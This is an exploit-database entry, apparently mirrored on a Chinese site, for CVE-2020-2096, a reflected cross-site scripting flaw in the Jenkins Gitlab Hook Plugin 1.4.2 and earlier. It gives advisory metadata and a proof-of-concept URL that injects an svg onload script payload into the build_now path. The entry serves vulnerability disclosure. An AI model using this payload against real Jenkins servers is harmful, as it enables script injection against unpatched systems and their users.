Jenkins Gitlab Hook Plugin 1.4.2 – Reflected Cross-Site Scripting - 体验盒子

作者： Ai Ho

日期： 2020-01-16

类别：

webapps

平台：

java

来源：https://www.exploit-db.com/exploits/47927/

# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
# Exploit Author: Ai Ho
# Vendor Homepage : https://jenkins.io/
# Effective version : Gitlab Hook Plugin 1.4.2 and earlier
# References: https://jenkins.io/security/advisory/2020-01-15/
# CVE: CVE-2020-2096

# PoC:
http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E